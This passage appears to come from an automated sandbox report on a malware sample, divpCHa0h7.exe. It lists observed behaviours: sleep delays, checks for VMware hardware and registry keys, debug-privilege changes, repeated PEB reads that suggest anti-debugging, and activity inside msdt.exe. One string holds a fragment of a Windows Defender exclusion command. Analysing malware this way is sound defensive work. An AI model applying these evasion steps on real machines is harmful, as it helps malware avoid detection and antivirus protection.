          Source: C:\Users\user\Desktop\divpCHa0h7.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeThread delayed: delay time: 30091Jump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.294005311.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.294005311.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.304751449.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000006.00000000.301545484.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000006.00000000.294080069.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000006.00000000.305488010.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000006.00000000.294080069.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004088E0 rdtsc 5_2_004088E0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]5_2_00FAB8D0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAB8D0 mov ecx, dword ptr fs:[00000030h]5_2_00FAB8D0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]5_2_00FAB8D0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]5_2_00FAB8D0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]5_2_00FAB8D0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]5_2_00FAB8D0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4F0BF mov ecx, dword ptr fs:[00000030h]5_2_00F4F0BF
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4F0BF mov eax, dword ptr fs:[00000030h]5_2_00F4F0BF
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4F0BF mov eax, dword ptr fs:[00000030h]5_2_00F4F0BF
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F590AF mov eax, dword ptr fs:[00000030h]5_2_00F590AF
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19080 mov eax, dword ptr fs:[00000030h]5_2_00F19080
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F93884 mov eax, dword ptr fs:[00000030h]5_2_00F93884
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F93884 mov eax, dword ptr fs:[00000030h]5_2_00F93884
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE1074 mov eax, dword ptr fs:[00000030h]5_2_00FE1074
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD2073 mov eax, dword ptr fs:[00000030h]5_2_00FD2073
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F30050 mov eax, dword ptr fs:[00000030h]5_2_00F30050
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F30050 mov eax, dword ptr fs:[00000030h]5_2_00F30050
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h]5_2_00F2B02A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h]5_2_00F2B02A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h]5_2_00F2B02A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h]5_2_00F2B02A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]5_2_00F4002D
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]5_2_00F4002D
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]5_2_00F4002D
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]5_2_00F4002D
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]5_2_00F4002D
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE4015 mov eax, dword ptr fs:[00000030h]5_2_00FE4015
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE4015 mov eax, dword ptr fs:[00000030h]5_2_00FE4015
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F97016 mov eax, dword ptr fs:[00000030h]5_2_00F97016
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F97016 mov eax, dword ptr fs:[00000030h]5_2_00F97016
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F97016 mov eax, dword ptr fs:[00000030h]5_2_00F97016
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1B1E1 mov eax, dword ptr fs:[00000030h]5_2_00F1B1E1
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1B1E1 mov eax, dword ptr fs:[00000030h]5_2_00F1B1E1
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1B1E1 mov eax, dword ptr fs:[00000030h]5_2_00F1B1E1
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FA41E8 mov eax, dword ptr fs:[00000030h]5_2_00FA41E8
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F461A0 mov eax, dword ptr fs:[00000030h]5_2_00F461A0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F461A0 mov eax, dword ptr fs:[00000030h]5_2_00F461A0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F969A6 mov eax, dword ptr fs:[00000030h]5_2_00F969A6
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4A185 mov eax, dword ptr fs:[00000030h]5_2_00F4A185
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3C182 mov eax, dword ptr fs:[00000030h]5_2_00F3C182
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1B171 mov eax, dword ptr fs:[00000030h]5_2_00F1B171
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1B171 mov eax, dword ptr fs:[00000030h]5_2_00F1B171
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1C962 mov eax, dword ptr fs:[00000030h]5_2_00F1C962
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3B944 mov eax, dword ptr fs:[00000030h]5_2_00F3B944
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3B944 mov eax, dword ptr fs:[00000030h]5_2_00F3B944
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4513A mov eax, dword ptr fs:[00000030h]5_2_00F4513A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4513A mov eax, dword ptr fs:[00000030h]5_2_00F4513A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h]5_2_00F34120
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h]5_2_00F34120
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h]5_2_00F34120
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h]5_2_00F34120
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F34120 mov ecx, dword ptr fs:[00000030h]5_2_00F34120
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19100 mov eax, dword ptr fs:[00000030h]5_2_00F19100
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19100 mov eax, dword ptr fs:[00000030h]5_2_00F19100
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19100 mov eax, dword ptr fs:[00000030h]5_2_00F19100
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F42AE4 mov eax, dword ptr fs:[00000030h]5_2_00F42AE4
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F42ACB mov eax, dword ptr fs:[00000030h]5_2_00F42ACB
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2AAB0 mov eax, dword ptr fs:[00000030h]5_2_00F2AAB0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2AAB0 mov eax, dword ptr fs:[00000030h]5_2_00F2AAB0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4FAB0 mov eax, dword ptr fs:[00000030h]5_2_00F4FAB0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]5_2_00F152A5
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]5_2_00F152A5
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]5_2_00F152A5
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]5_2_00F152A5
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]5_2_00F152A5
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4D294 mov eax, dword ptr fs:[00000030h]5_2_00F4D294
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4D294 mov eax, dword ptr fs:[00000030h]5_2_00F4D294
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F5927A mov eax, dword ptr fs:[00000030h]5_2_00F5927A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FCB260 mov eax, dword ptr fs:[00000030h]5_2_00FCB260
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FCB260 mov eax, dword ptr fs:[00000030h]5_2_00FCB260
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8A62 mov eax, dword ptr fs:[00000030h]5_2_00FE8A62
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FA4257 mov eax, dword ptr fs:[00000030h]5_2_00FA4257
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]5_2_00F19240
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]5_2_00F19240
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]5_2_00F19240
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]5_2_00F19240
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1AA16 mov eax, dword ptr fs:[00000030h]5_2_00F1AA16
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1AA16 mov eax, dword ptr fs:[00000030h]5_2_00F1AA16
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F33A1C mov eax, dword ptr fs:[00000030h]5_2_00F33A1C
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F28A0A mov eax, dword ptr fs:[00000030h]5_2_00F28A0A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]5_2_00F403E2
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F953CA mov eax, dword ptr fs:[00000030h]5_2_00F953CA
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F953CA mov eax, dword ptr fs:[00000030h]5_2_00F953CA
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE5BA5 mov eax, dword ptr fs:[00000030h]5_2_00FE5BA5
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4B390 mov eax, dword ptr fs:[00000030h]5_2_00F4B390
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD138A mov eax, dword ptr fs:[00000030h]5_2_00FD138A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FCD380 mov ecx, dword ptr fs:[00000030h]5_2_00FCD380
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F21B8F mov eax, dword ptr fs:[00000030h]5_2_00F21B8F
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F21B8F mov eax, dword ptr fs:[00000030h]5_2_00F21B8F
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F43B7A mov eax, dword ptr fs:[00000030h]5_2_00F43B7A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F43B7A mov eax, dword ptr fs:[00000030h]5_2_00F43B7A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1DB60 mov ecx, dword ptr fs:[00000030h]5_2_00F1DB60
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8B58 mov eax, dword ptr fs:[00000030h]5_2_00FE8B58
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1F358 mov eax, dword ptr fs:[00000030h]5_2_00F1F358
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1DB40 mov eax, dword ptr fs:[00000030h]5_2_00F1DB40
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD131B mov eax, dword ptr fs:[00000030h]5_2_00FD131B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD14FB mov eax, dword ptr fs:[00000030h]5_2_00FD14FB
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]5_2_00F96CF0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]5_2_00F96CF0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]5_2_00F96CF0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8CD6 mov eax, dword ptr fs:[00000030h]5_2_00FE8CD6
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2849B mov eax, dword ptr fs:[00000030h]5_2_00F2849B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3746D mov eax, dword ptr fs:[00000030h]5_2_00F3746D
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAC450 mov eax, dword ptr fs:[00000030h]5_2_00FAC450
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAC450 mov eax, dword ptr fs:[00000030h]5_2_00FAC450
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4A44B mov eax, dword ptr fs:[00000030h]5_2_00F4A44B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4BC2C mov eax, dword ptr fs:[00000030h]5_2_00F4BC2C
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]5_2_00FE740D
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]5_2_00FE740D
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]5_2_00FE740D
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]5_2_00F96C0A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]5_2_00F96C0A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]5_2_00F96C0A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]5_2_00F96C0A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]5_2_00FD1C06
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FC8DF1 mov eax, dword ptr fs:[00000030h]5_2_00FC8DF1
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2D5E0 mov eax, dword ptr fs:[00000030h]5_2_00F2D5E0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2D5E0 mov eax, dword ptr fs:[00000030h]5_2_00F2D5E0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]5_2_00F41DB5
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]5_2_00F41DB5
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]5_2_00F41DB5
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F435A1 mov eax, dword ptr fs:[00000030h]5_2_00F435A1
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4FD9B mov eax, dword ptr fs:[00000030h]5_2_00F4FD9B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4FD9B mov eax, dword ptr fs:[00000030h]5_2_00F4FD9B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]5_2_00F12D8A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]5_2_00F12D8A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]5_2_00F12D8A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]5_2_00F12D8A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]5_2_00F12D8A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3C577 mov eax, dword ptr fs:[00000030h]5_2_00F3C577
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3C577 mov eax, dword ptr fs:[00000030h]5_2_00F3C577
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F37D50 mov eax, dword ptr fs:[00000030h]5_2_00F37D50
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F53D43 mov eax, dword ptr fs:[00000030h]5_2_00F53D43
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F93540 mov eax, dword ptr fs:[00000030h]5_2_00F93540
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1AD30 mov eax, dword ptr fs:[00000030h]5_2_00F1AD30
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8D34 mov eax, dword ptr fs:[00000030h]5_2_00FE8D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F9A537 mov eax, dword ptr fs:[00000030h]5_2_00F9A537
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]5_2_00F44D3B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]5_2_00F44D3B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]5_2_00F44D3B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F276E2 mov eax, dword ptr fs:[00000030h]5_2_00F276E2
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F416E0 mov ecx, dword ptr fs:[00000030h]5_2_00F416E0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8ED6 mov eax, dword ptr fs:[00000030h]5_2_00FE8ED6
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F58EC7 mov eax, dword ptr fs:[00000030h]5_2_00F58EC7
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F436CC mov eax, dword ptr fs:[00000030h]5_2_00F436CC
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FCFEC0 mov eax, dword ptr fs:[00000030h]5_2_00FCFEC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]15_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]15_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]15_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]15_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]15_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]15_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFF0BF mov ecx, dword ptr fs:[00000030h]15_2_04AFF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFF0BF mov eax, dword ptr fs:[00000030h]15_2_04AFF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFF0BF mov eax, dword ptr fs:[00000030h]15_2_04AFF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B090AF mov eax, dword ptr fs:[00000030h]15_2_04B090AF
